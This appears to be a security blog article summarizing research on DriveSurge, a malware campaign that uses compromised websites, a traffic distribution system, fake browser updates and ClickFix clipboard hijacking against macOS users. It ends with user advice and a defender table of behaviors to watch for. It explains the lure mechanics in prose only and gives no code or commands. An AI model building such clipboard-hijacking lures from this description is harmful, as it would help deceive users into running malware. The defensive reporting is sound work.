Security researchers at Silent Push recently published research on a threat actor they call DriveSurge, a malware delivery operation that uses compromised legitimate websites to push fake browser updates and ClickFix-style attacks. The campaign is notable because it does not rely only on suspicious domains or obvious phishing pages. Instead, it abuses websites people may already trust.
What Is DriveSurge?
DriveSurge is described by Silent Push as a threat actor using compromised websites to route visitors toward malware delivery pages. The researchers believe the group may operate like an Initial Access Broker, meaning its role is to generate infected systems or victim leads that can later be used by other criminals. Silent Push also suspects a pay-per-install model, where successful infections have direct value to the operator.
The important point is that DriveSurge does not need to trick users into visiting an obviously malicious website. A victim may start on a normal business, professional, or local organization website that has been silently compromised.
How the Attack Works
The campaign uses a traffic distribution system, often called a TDS, to decide what a visitor should see. A TDS can profile a visitor's browser, operating system, location, and other traits, then choose whether to show a malicious page, redirect the visitor, or do nothing. Silent Push reports that DriveSurge uses an open-source TDS called zTDS.
From the user's perspective, the attack may look like one of two familiar scenarios.
The first is a fake browser update. The victim sees a page that appears to come from a known browser and is told they need to update before continuing. Silent Push observed fake update behavior impersonating multiple common browsers.
The second is a ClickFix attack. Instead of offering a download, the page claims there is a problem that the user can fix by copying and running a command. This is social engineering dressed up as troubleshooting. The user believes they are completing a security check or fixing a browser issue, but they are actually being guided into executing malware.
The macOS Angle
One of the more interesting parts of the research involves an obfuscated JavaScript payload that specifically targeted desktop macOS users. Silent Push found that the script checked the visitor's environment first, looking for macOS while excluding mobile Apple devices such as iPhones and iPads.
That matters because the lure depends on instructions that only make sense on a Mac. The page can tell the victim to use Spotlight, open Terminal, and paste a "verification" command. If the same instructions appeared on a phone, the scam would immediately look broken. By filtering for the right environment, the attacker makes the fake prompt feel more believable.
Clipboard Hijacking: The Core Trick
The most dangerous part of the flow is the clipboard manipulation.
The victim sees something that looks like a verification prompt, such as a fake "I'm not a robot" check. When they click it, the page silently writes a malicious command to the clipboard. The page then tells the user to open Terminal and paste what they believe is a verification code. Silent Push describes this as clipboard hijacking, where the copied content is not what the user thinks it is.
This is effective because it bypasses the normal mental model many users have about web security. People often assume that a website cannot directly run commands on their computer. That is mostly true. But the attacker does not need the browser to run the command. They convince the user to do it manually.
The browser is not exploiting macOS directly. The web page is exploiting trust, urgency, and habit.
Why This Attack Is Convincing
These attacks work because they borrow language and design from real security experiences. Users are used to CAPTCHAs, browser update prompts, access checks, and troubleshooting messages. A fake verification step does not feel unusual anymore.
The campaign also benefits from appearing on legitimate compromised websites. If a user lands on a site they recognize, they are less likely to question what happens next. The trust belongs to the original site, but the attacker borrows it.
There is also a technical reason this can be hard to spot. The injected scripts may be obfuscated, meaning the code is intentionally made difficult to read. Silent Push noted heavy obfuscation in the payload they analyzed, which helped hide the attack logic and the follow-on behavior.
What Users Should Learn From This
The main lesson is simple: a website should never ask you to paste a command into Terminal, PowerShell, Command Prompt, or any other shell to prove you are human.
A real CAPTCHA does not require Terminal. A real browser update does not require pasted shell commands. A real website error does not need you to run an encoded fix from your clipboard.
| Scenario | Safe? |
|---|---|
| A CAPTCHA asks you to click images or solve a puzzle | Normal |
| A page asks you to open Terminal and paste a command | Scam |
| A browser update prompt appears in the browser itself | Normal |
| A website asks you to paste something to "fix" a browser error | Scam |
| A "verification" step requires pressing keyboard shortcuts outside the browser | Scam |
If a site says you must run a command to continue, close the page. If you already pasted and ran something suspicious, disconnect from the network immediately and contact your IT or security team.
What Defenders Should Watch For
For security teams, the DriveSurge research is a useful reminder that malware delivery increasingly blends web compromise, traffic filtering, and user-driven execution.
Defenders should focus less on one specific indicator and more on behaviors:
| Behavior | Why It Matters |
|---|---|
| Browser sessions leading users to copy commands | Clipboard hijack precursor |
| Web pages using clipboard-writing in unusual contexts | Core delivery mechanism |
| Terminal activity shortly after browser interaction | Indicates command was pasted and run |
| Shell commands downloading files to temp locations, then deleting them | Common post-execution cleanup pattern |
| Unexpected script execution on macOS endpoints | Payload running |
| Compromised websites loading unfamiliar third-party JavaScript | Injection point |
Security awareness training should also be updated. Many users have been taught to avoid suspicious attachments and fake login pages, but fewer have been warned about fake CAPTCHA and verification pages that tell them to paste commands into Terminal or PowerShell.
Sources: - Silent Push — DriveSurge: Analyzing an Obfuscated Payload Leads to macOS Malware